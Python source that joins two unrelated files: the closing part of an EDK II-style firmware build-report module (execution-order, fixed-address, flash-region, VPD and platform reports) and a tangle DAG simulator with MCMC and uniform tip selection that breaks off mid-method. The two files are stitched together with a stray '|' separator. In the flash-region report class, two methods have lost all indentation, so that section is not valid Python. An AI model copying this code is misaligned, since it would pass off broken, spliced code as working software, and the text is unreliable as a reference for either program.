        for Key in self._GuidMap:
            FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
        TempFile.close()
        try:
            from Eot.EotMain import Eot
            #
            # Invoke EOT tool and echo its runtime performance
            #
            EotStartTime = time.time()
            Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
                FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
            EotEndTime = time.time()
            EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
            EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
            #
            # Parse the output of EOT tool
            #
            for Line in open(DispatchList):
                if len(Line.split()) < 4:
                    continue
                (Guid, Phase, FfsName, FilePath) = Line.split()
                Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
                if len(Symbol) > self.MaxLen:
                    self.MaxLen = len(Symbol)
                self.ItemList.append((Phase, Symbol, FilePath))
        except:
            # EOT is best-effort: any failure downgrades to a warning so the
            # rest of the build report is still produced.
            EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
            EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
    ##
    # Generate platform execution order report
    #
    # This function generates the predicted module execution order.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def _GenerateExecutionOrderReport(self, File):
        self._InvokeEotTool()
        if len(self.ItemList) == 0:
            return
        FileWrite(File, gSectionStart)
        FileWrite(File, "Execution Order Prediction")
        FileWrite(File, "*P PEI phase")
        FileWrite(File, "*D DXE phase")
        FileWrite(File, "*E Module INF entry point name")
        FileWrite(File, "*N Module notification function name")
        FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
        FileWrite(File, gSectionSep)
        for Item in self.ItemList:
            FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
        # NOTE(review): this closes the section with gSectionStart rather than
        # gSectionEnd — matches historical report output; confirm before changing.
        FileWrite(File, gSectionStart)
    ##
    # Generate Fixed Address report.
    #
    # This function generate the predicted fixed address report for a module
    # specified by Guid.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    # @param Guid            The module Guid value.
    # @param NotifyList      The list of all notify function in a module
    #
    def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
        self._ParseMapFile()
        FixedAddressList = self.FixedMapDict.get(Guid)
        if not FixedAddressList:
            return
        FileWrite(File, gSubSectionStart)
        FileWrite(File, "Fixed Address Prediction")
        FileWrite(File, "*I Image Loading Address")
        FileWrite(File, "*E Entry Point Address")
        FileWrite(File, "*N Notification Function Address")
        FileWrite(File, "*F Flash Address")
        FileWrite(File, "*M Memory Address")
        FileWrite(File, "*S SMM RAM Offset")
        FileWrite(File, "TOM Top of Memory")
        FileWrite(File, "Type Address Name")
        FileWrite(File, gSubSectionSep)
        for Item in FixedAddressList:
            Type = Item[0]
            Value = Item[1]
            Symbol = Item[2]
            if Symbol == "*I":
                Name = "(Image Base)"
            elif Symbol == "*E":
                Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
            elif Symbol in NotifyList:
                Name = Symbol
                Symbol = "*N"
            else:
                continue
            # Append the address-space suffix: F=flash, M=memory, S=SMM RAM.
            if "Flash" in Type:
                Symbol += "F"
            elif "Memory" in Type:
                Symbol += "M"
            else:
                Symbol += "S"
            # Negative offsets are relative to the top of memory.
            if Value[0] == "-":
                Value = "TOM" + Value
            FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
    ##
    # Generate report for the prediction part
    #
    # This function generate the predicted fixed address report for a module or
    # predicted module execution order for a platform.
    # If the input Guid is None, then, it generates the predicted module execution order;
    # otherwise it generates the module fixed loading address for the module specified by
    # Guid.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    # @param Guid            The module Guid value.
    #
    def GenerateReport(self, File, Guid):
        if Guid:
            self._GenerateFixedAddressReport(File, Guid.upper(), [])
        else:
            self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
    def _DiscoverNestedFvList(self, FvName, Wa):
        """Depth-first discovery of FVs nested inside *FvName*.

        Each newly found nested FV is recorded in self.FvList, self.FvInfo
        (with a "Nested FV" placeholder entry) and self._GuidsDb, then
        searched recursively for further nesting.
        """
        FvDictKey=FvName.upper()
        if FvDictKey in Wa.FdfProfile.FvDict:
            for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                for Section in Ffs.SectionList:
                    try:
                        # Only FV-image sections expose SectionList/FvName;
                        # other section types raise AttributeError.
                        for FvSection in Section.SectionList:
                            if FvSection.FvName in self.FvList:
                                continue
                            self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
                            self.FvList.append(FvSection.FvName)
                            self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
                            self._DiscoverNestedFvList(FvSection.FvName, Wa)
                    except AttributeError:
                        pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
    def __init__(self, FdRegion, Wa):
        self.Type = FdRegion.RegionType
        self.BaseAddress = FdRegion.Offset
        self.Size = FdRegion.Size
        self.FvList = []
        self.FvInfo = {}
        self._GuidsDb = {}
        self._FvDir = Wa.FvDir
        self._WorkspaceDir = Wa.WorkspaceDir
        #
        # If the input FdRegion is not a firmware volume,
        # we are done.
        #
        if self.Type != BINARY_FILE_TYPE_FV:
            return
        #
        # Find all nested FVs in the FdRegion
        #
        for FvName in FdRegion.RegionDataList:
            if FvName in self.FvList:
                continue
            self.FvList.append(FvName)
            self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
            self._DiscoverNestedFvList(FvName, Wa)
        PlatformPcds = {}
        #
        # Collect PCDs declared in DEC files.
        #
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
                    DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
                    PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
        #
        # Collect PCDs defined in DSC file (these override the DEC defaults
        # collected above, since they are written into the same dictionary).
        #
        for Pa in Wa.AutoGenObjectList:
            for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
                PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
        #
        # Add PEI and DXE a priori files GUIDs defined in PI specification.
        #
        self._GuidsDb["1B45CC0A-156A-428A-AF62-49864DA0E6E6"] = "PEI Apriori"
        self._GuidsDb["FC510EE7-FFDC-11D4-BD41-0080C73C8881"] = "DXE Apriori"
        #
        # Add ACPI table storage file
        #
        self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
        # Map every platform module's GUID to "BaseName (INF path)" for
        # human-readable identification in the region listing.
        for Pa in Wa.AutoGenObjectList:
            for ModuleKey in Pa.Platform.Modules:
                M = Pa.Platform.Modules[ModuleKey].M
                InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
                self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
        #
        # Collect the GUID map in the FV firmware volume
        #
        for FvName in self.FvList:
            FvDictKey=FvName.upper()
            if FvDictKey in Wa.FdfProfile.FvDict:
                for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                    try:
                        #
                        # collect GUID map for binary EFI file in FDF file.
                        #
                        Guid = Ffs.NameGuid.upper()
                        # The FFS "GUID" may actually be a PCD reference
                        # (TokenSpace.TokenName); resolve it to the real GUID
                        # value recorded in the platform PCD tables.
                        Match = gPcdGuidPattern.match(Ffs.NameGuid)
                        if Match:
                            PcdTokenspace = Match.group(1)
                            PcdToken = Match.group(2)
                            if (PcdToken, PcdTokenspace) in PlatformPcds:
                                GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
                                Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
                        for Section in Ffs.SectionList:
                            try:
                                ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
                                self._GuidsDb[Guid] = ModuleSectFile
                            except AttributeError:
                                pass
                    except AttributeError:
                        pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# If the region type is a firmware volume, it lists module offsets and identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
    ##
    # Constructor function for class FdReport
    #
    # This constructor function generates FdReport object for a specified
    # firmware device, including its regions and (if present) parsed VPD
    # entries rebased to the VPD region's base address.
    #
    # @param self            The object pointer
    # @param Fd              The current Firmware device object
    # @param Wa              Workspace context information
    #
    def __init__(self, Fd, Wa):
        self.FdName = Fd.FdUiName
        self.BaseAddress = Fd.BaseAddress
        self.Size = Fd.Size
        self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
        self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
        self.VpdFilePath = os.path.join(self.FvPath, "%s.map" % Wa.Platform.VpdToolGuid)
        self.VPDBaseAddress = 0
        self.VPDSize = 0
        self.VPDInfoList = []
        for index, FdRegion in enumerate(Fd.RegionList):
            # BUGFIX: was `str(FdRegion.RegionType) is 'FILE'`. `is` compares
            # object identity; a freshly built str() result is not guaranteed
            # to be the same object as the literal, so the VPD region could be
            # silently skipped. Use value equality.
            if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
                self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
                self.VPDSize = self.FdRegionList[index].Size
                break
        if os.path.isfile(self.VpdFilePath):
            # Parse the VPD map file: PcdName|SkuId|Offset|Size|Value lines,
            # '#' starts a comment.
            with open(self.VpdFilePath, "r") as fd:
                for Line in fd:
                    Line = Line.strip()
                    if len(Line) == 0 or Line.startswith("#"):
                        continue
                    try:
                        PcdName, SkuId, Offset, Size, Value = Line.split("#")[0].split("|")
                        PcdName, SkuId, Offset, Size, Value = PcdName.strip(), SkuId.strip(), Offset.strip(), Size.strip(), Value.strip()
                        # Rebase the per-entry offset to the absolute VPD
                        # region base address.
                        if Offset.lower().startswith('0x'):
                            Offset = '0x%08X' % (int(Offset, 16) + self.VPDBaseAddress)
                        else:
                            Offset = '0x%08X' % (int(Offset, 10) + self.VPDBaseAddress)
                        self.VPDInfoList.append("%s | %s | %s | %s | %s" % (PcdName, SkuId, Offset, Size, Value))
                    except Exception:
                        # Narrowed from a bare `except:`; EdkLogger.error
                        # reports the malformed file.
                        EdkLogger.error("BuildReport", CODE_ERROR, "Fail to parse VPD information file %s" % self.VpdFilePath)
    ##
    # Generate report for the firmware device.
    #
    # This function generates report for the firmware device.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        FileWrite(File, gSectionStart)
        FileWrite(File, "Firmware Device (FD)")
        FileWrite(File, "FD Name: %s" % self.FdName)
        FileWrite(File, "Base Address: %s" % self.BaseAddress)
        FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
        if len(self.FdRegionList) > 0:
            FileWrite(File, gSectionSep)
            for FdRegionItem in self.FdRegionList:
                FdRegionItem.GenerateReport(File)
        if len(self.VPDInfoList) > 0:
            FileWrite(File, gSubSectionStart)
            FileWrite(File, "FD VPD Region")
            FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
            FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
            FileWrite(File, gSubSectionSep)
            for item in self.VPDInfoList:
                ValueList = item.split('|')
                Value = ValueList[-1].strip()
                IsByteArray, ArrayList = ByteArrayForamt(Value)
                if IsByteArray:
                    # Byte-array values are expanded one array line per row.
                    ValueList[-1] = ' {'
                    FileWrite(File, '|'.join(ValueList))
                    for Array in ArrayList:
                        FileWrite(File, Array)
                else:
                    FileWrite(File, item)
            FileWrite(File, gSubSectionEnd)
        FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
    ##
    # Constructor function for class PlatformReport
    #
    # This constructor function generates PlatformReport object a platform build.
    # It generates report for platform summary, flash, global PCDs and detailed
    # module information for modules involved in platform build.
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    # @param MaList          The list of modules in the platform build
    # @param ReportType      The kinds of report sections to generate
    #
    def __init__(self, Wa, MaList, ReportType):
        self._WorkspaceDir = Wa.WorkspaceDir
        self.PlatformName = Wa.Name
        self.PlatformDscPath = Wa.Platform
        self.Architectures = " ".join(Wa.ArchList)
        self.ToolChain = Wa.ToolChain
        self.Target = Wa.BuildTarget
        self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
        self.BuildEnvironment = platform.platform()
        # Sub-reports are only constructed when requested in ReportType.
        self.PcdReport = None
        if "PCD" in ReportType:
            self.PcdReport = PcdReport(Wa)
        self.FdReportList = []
        # Flash report only applies to full platform builds (MaList is None)
        # that have an FDF profile.
        if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
            for Fd in Wa.FdfProfile.FdDict:
                self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
        self.PredictionReport = None
        if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
            self.PredictionReport = PredictionReport(Wa)
        self.DepexParser = None
        if "DEPEX" in ReportType:
            self.DepexParser = DepexParser(Wa)
        self.ModuleReportList = []
        if MaList is not None:
            # Module build: report exactly the requested modules.
            self._IsModuleBuild = True
            for Ma in MaList:
                self.ModuleReportList.append(ModuleReport(Ma, ReportType))
        else:
            # Platform build: gather modules from every platform autogen
            # object, plus any INFs referenced only by the FDF.
            self._IsModuleBuild = False
            for Pa in Wa.AutoGenObjectList:
                ModuleAutoGenList = []
                for ModuleKey in Pa.Platform.Modules:
                    ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
                if GlobalData.gFdfParser is not None:
                    if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
                        INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
                        for InfName in INFList:
                            InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
                            Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
                            if Ma is None:
                                continue
                            if Ma not in ModuleAutoGenList:
                                ModuleAutoGenList.append(Ma)
                for MGen in ModuleAutoGenList:
                    self.ModuleReportList.append(ModuleReport(MGen, ReportType))
    ##
    # Generate report for the whole platform.
    #
    # This function generates report for platform information.
    # It comprises of platform summary, global PCD, flash and
    # module list sections.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    # @param BuildDuration   The total time to build the modules
    # @param AutoGenTime     The total time of AutoGen Phase
    # @param MakeTime        The total time of Make Phase
    # @param GenFdsTime      The total time of GenFds Phase
    # @param ReportType      The kind of report items in the final report file
    #
    def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
        FileWrite(File, "Platform Summary")
        FileWrite(File, "Platform Name: %s" % self.PlatformName)
        FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
        FileWrite(File, "Architectures: %s" % self.Architectures)
        FileWrite(File, "Tool Chain: %s" % self.ToolChain)
        FileWrite(File, "Target: %s" % self.Target)
        if GlobalData.gSkuids:
            FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
        if GlobalData.gDefaultStores:
            FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
        FileWrite(File, "Output Path: %s" % self.OutputPath)
        FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
        FileWrite(File, "Build Duration: %s" % BuildDuration)
        # Phase durations are optional; only print the ones measured.
        if AutoGenTime:
            FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
        if MakeTime:
            FileWrite(File, "Make Duration: %s" % MakeTime)
        if GenFdsTime:
            FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
        FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
        if GlobalData.MixedPcd:
            FileWrite(File, gSectionStart)
            FileWrite(File, "The following PCDs use different access methods:")
            FileWrite(File, gSectionSep)
            for PcdItem in GlobalData.MixedPcd:
                FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
            FileWrite(File, gSectionEnd)
        # Platform-wide sections are skipped for module-only builds.
        if not self._IsModuleBuild:
            if "PCD" in ReportType:
                self.PcdReport.GenerateReport(File, None)
            if "FLASH" in ReportType:
                for FdReportListItem in self.FdReportList:
                    FdReportListItem.GenerateReport(File)
        for ModuleReportItem in self.ModuleReportList:
            ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
        if not self._IsModuleBuild:
            if "EXECUTION_ORDER" in ReportType:
                self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
    ##
    # Constructor function for class BuildReport
    #
    # Records the report file name and de-duplicates the requested report
    # types (order-preserving). When no types are given, a default set is
    # used. When ReportFile is falsy, reporting is disabled entirely.
    #
    # @param self            The object pointer
    # @param ReportFile      The file name to save report file
    # @param ReportType      The kind of report items in the final report file
    #
    def __init__(self, ReportFile, ReportType):
        self.ReportFile = ReportFile
        if ReportFile:
            self.ReportList = []
            self.ReportType = []
            if ReportType:
                # Preserve caller order while dropping duplicates.
                for ReportTypeItem in ReportType:
                    if ReportTypeItem not in self.ReportType:
                        self.ReportType.append(ReportTypeItem)
            else:
                self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
    ##
    # Adds platform report to the list
    #
    # This function adds a platform report to the final report list.
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    # @param MaList          The list of modules in the platform build
    #
    def AddPlatformReport(self, Wa, MaList=None):
        if self.ReportFile:
            self.ReportList.append((Wa, MaList))
    ##
    # Generates the final report.
    #
    # This function generates platform build report. It invokes GenerateReport()
    # method for every platform report in the list.
    #
    # @param self            The object pointer
    # @param BuildDuration   The total time to build the modules
    # @param AutoGenTime     The total time of AutoGen phase
    # @param MakeTime        The total time of Make phase
    # @param GenFdsTime      The total time of GenFds phase
    #
    def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
        if self.ReportFile:
            try:
                File = StringIO('')
                for (Wa, MaList) in self.ReportList:
                    PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
                Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
                SaveFileOnChange(self.ReportFile, Content, True)
                EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
            except IOError:
                EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
            except Exception:
                # BUGFIX: was a bare `except:`, which also swallowed
                # SystemExit and KeyboardInterrupt; catch only real errors.
                EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
                EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
            File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
    # This module provides report classes for the build tools and has no
    # standalone behavior.
    pass
|
DAG.py | import numpy as np
import networkx as nx
import matplotlib.pyplot as plt
import threading
import random
import time as timeee
# This is the base of CIDDS simulator
#
# Here we have a Directed Acyclic Graph (DAG), which is the core data structure of the simulation.
#
# Implementation of algorithms for MCMC and URTS are inspired from inputs by
# Alon Gal from IOTA foundation and Minh-nghia, Nguyen.
# For more details on their individual works visit:
# https://github.com/iotaledger/iotavisualization
# https://github.com/minh-nghia/TangleSimulator
class Node(object):
    '''
    Stores the individual transaction detail for a tangle
    '''
    def __init__(self, id: str, time: float):
        '''
        constructor
        :param id: id of the node
        :param time: timestamp in unit time
        '''
        # Fixed initial plot coordinates; nothing in this class updates them.
        self.x = 300
        self.y = 200
        self.id = id
        self.time = time
    def is_tip_delayed(self):
        # NOTE(review): Node never assigns self.dag or self.approved_time, so
        # calling this raises AttributeError. It mirrors
        # Transaction.is_tip_delayed (with a 5.0 delay instead of 1.0) —
        # presumably copied over; confirm whether it is ever called.
        return self.dag.time - 5.0 < self.approved_time
class DAG(object):
    """Tangle simulator: issues transactions at `rate` per unit time and
    attaches each new transaction to tips chosen by MCMC or uniform random
    tip selection (URTS)."""
    def __init__(self, rate=50, alpha=0.001, algorithm='mcmc', plot=False):
        self.time = 1.0
        self.rate = rate
        self.alpha = alpha  # MCMC bias toward heavier cumulative weight
        if plot:
            # The networkx graph is only maintained when plotting is requested.
            self.graph = nx.OrderedDiGraph()
        self.algorithm = algorithm
        self.cw_cache = dict()          # memo: transaction num -> delayed cumulative weight
        self.transaction_cache = set()  # shared scratch set for approved_by traversals
        self.tip_walk_cache = list()    # tips found by the current round of MCMC walks
        self.genesis = Genesis(self)
        self.transactions = [self.genesis]
        self.tra_id_counter = 1
        self.nodes = [Node(id=0, time=0)]
    def generate_next_node(self):
        """Advance time by an exponential inter-arrival and attach one new
        transaction to tips selected by the configured algorithm."""
        time_difference = np.random.exponential(1.0 / self.rate)
        self.time += time_difference
        self.tra_id_counter += 1
        if self.algorithm == 'mcmc':
            approved_tips = set(self.mcmc())
        elif self.algorithm == 'urts':
            approved_tips = set(self.urts())
        else:
            # BUGFIX(minor): raise an informative ValueError instead of a
            # bare Exception() (still caught by `except Exception`).
            raise ValueError('unknown tip-selection algorithm: %r' % self.algorithm)
        transaction = Transaction(self, self.time, approved_tips,
                                  self.tra_id_counter - 1)
        newNode = Node(id=str(transaction.num), time=transaction.time)
        self.nodes.append(newNode)
        self.transactions.append(transaction)
        for t in approved_tips:
            # Record the earliest time each tip got approved.
            t.approved_time = np.minimum(self.time, t.approved_time)
            t._approved_directly_by.add(transaction)
            if hasattr(self, 'graph'):
                self.graph.add_edges_from([(transaction.num, t.num)])
        # Cumulative weights change with every attachment; drop the memo.
        self.cw_cache = {}
    def tips(self):
        # Visible transactions that are not yet (visibly) approved.
        return [t for t in self.transactions if t.is_visible() and t.is_tip_delayed()]
    def urts(self):
        """Uniform random tip selection: return up to two tips (falls back to
        any visible transaction when there are no tips)."""
        tips = self.tips()
        if len(tips) == 0:
            return np.random.choice(
                [t for t in self.transactions if t.is_visible()]),
        if len(tips) == 1:
            return tips[0],
        return np.random.choice(tips, 2)
    def mcmc(self):
        """Markov-chain Monte Carlo tip selection: start several walkers on
        older transactions and return the first two tips they reach."""
        num_particles = 10
        lower_bound = int(np.maximum(0, self.tra_id_counter - 20.0 * self.rate))
        upper_bound = int(np.maximum(1, self.tra_id_counter - 10.0 * self.rate))
        candidates = self.transactions[lower_bound:upper_bound]
        particles = np.random.choice(candidates, num_particles)
        for p in particles:
            # BUGFIX: the original did `threading.Thread(target=self.mcmc_walk(p)).start()`,
            # which *called* mcmc_walk synchronously and handed its None result
            # to Thread, so the started threads did nothing. The walks have
            # therefore always run sequentially; do that explicitly and skip
            # the pointless Thread objects.
            self.mcmc_walk(p)
        tips = self.tip_walk_cache[:2]
        self.tip_walk_cache = list()
        return tips
    def mcmc_walk(self, starting_transaction):
        """Walk from `starting_transaction` toward the tips, biased by
        cumulative weight when alpha > 0; append the reached tip to
        tip_walk_cache (stops early once two tips are found)."""
        p = starting_transaction
        while not p.is_tip_delayed() and p.is_visible():
            if len(self.tip_walk_cache) >= 2:
                return
            next_transactions = p.approved_directly_by()
            if self.alpha > 0:
                p_cw = p.calculate_delayed_cumulative_weight()
                c_weights = np.array([])
                for transaction in next_transactions:
                    c_weights = np.append(c_weights,
                                          transaction.calculate_delayed_cumulative_weight())
                # Softmax-like transition probabilities over weight differences.
                deno = np.sum(np.exp(-self.alpha * (p_cw - c_weights)))
                probs = np.divide(np.exp(-self.alpha * (p_cw - c_weights)),
                                  deno)
            else:
                probs = None  # uniform choice
            p = np.random.choice(next_transactions, p=probs)
        self.tip_walk_cache.append(p)
    def plot(self):
        """Draw the tangle with networkx/matplotlib; returns the plt module."""
        global transactionCounter
        transactionCounter = 0
        if hasattr(self, 'graph'):
            pos = nx.get_node_attributes(self.graph, 'pos')
            nx.draw_networkx_nodes(self.graph, pos, node_color='g', node_size=600, alpha=0.65)
            nx.draw_networkx_labels(self.graph, pos, font_color="r", font_weight="bold", font_size=20)
            nx.draw_networkx_edges(self.graph, pos, edgelist=self.graph.edges(), arrows=True)
        plt.xlabel('Time')
        plt.yticks([])
        return plt
class Transaction(object):
    """A single tangle transaction; tracks which transactions approve it and
    when it was first approved."""
    def __init__(self, dag, time, approved_transactions, num, malicious=False):
        self.dag = dag
        self.time = time
        self.approved_transactions = approved_transactions
        self._approved_directly_by = set()
        self.approved_time = float('inf')  # set once some transaction approves this one
        self.num = num
        self._approved_by = set()
        if hasattr(self.dag, 'graph'):
            # BUGFIX: this used the undefined attribute `self.traId`, raising
            # AttributeError whenever plotting was enabled. The node id used
            # everywhere else (edges in DAG, Genesis) is `num`.
            self.dag.graph.add_node(self.num, pos=(self.time, np.random.uniform(-1, 1)))
    def is_visible(self):
        # A transaction takes 1.0 time units to propagate before others see it.
        return self.dag.time >= self.time + 1.0
    def is_tip(self):
        return self.dag.time < self.approved_time
    def is_tip_delayed(self):
        # Tip status as seen by others (approvals also take 1.0 to propagate).
        return self.dag.time - 1.0 < self.approved_time
    def cumulative_weight(self):
        """1 + number of transactions that (transitively) approve this one."""
        cw = 1 + len(self.approved_by())
        self.dag.transaction_cache = set()  # reset the shared traversal scratch set
        return cw
    def calculate_delayed_cumulative_weight(self):
        """Cumulative weight counting only visible approvers; memoized in
        dag.cw_cache."""
        cached = self.dag.cw_cache.get(self.num)
        if cached:
            return cached
        cached = 1 + len(self.approved_by_delayed())
        self.dag.transaction_cache = set()
        self.dag.cw_cache[self.num] = cached
        return cached
    def approved_by(self):
        # Transitive closure of approvers, accumulated in the shared
        # dag.transaction_cache set (caller must reset it afterwards).
        for t in self._approved_directly_by:
            if t not in self.dag.transaction_cache:
                self.dag.transaction_cache.add(t)
                self.dag.transaction_cache.update(t.approved_by())
